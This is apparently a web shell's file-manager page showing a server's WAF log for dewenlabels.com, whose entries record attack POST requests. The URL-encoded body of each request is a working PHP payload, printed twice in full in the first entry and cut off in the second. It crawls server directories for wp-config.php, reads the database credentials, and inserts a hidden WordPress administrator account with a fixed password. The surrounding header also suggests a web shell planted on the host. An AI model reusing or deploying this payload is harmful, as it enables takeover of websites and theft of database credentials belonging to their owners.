HEX
Server: nginx/1.26.1
System: Linux iZrj9cbdvwu1cot8sjlyzlZ 5.10.134-15.al8.x86_64 #1 SMP Thu Jul 20 00:44:04 CST 2023 x86_64
User: www (1000)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwlogs/free_waf_log/
Upload Files
File: /www/wwwlogs/free_waf_log/dewenlabels.com_2026-05-16.log
["2026-05-16 00:04:15","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> oT:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvo1DvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzSwL2IjqPV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-user:?1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-length:12640\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-fetch-dest:document\n\noT=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:04:33","213.209.159.254","POST","\/","Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Np:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3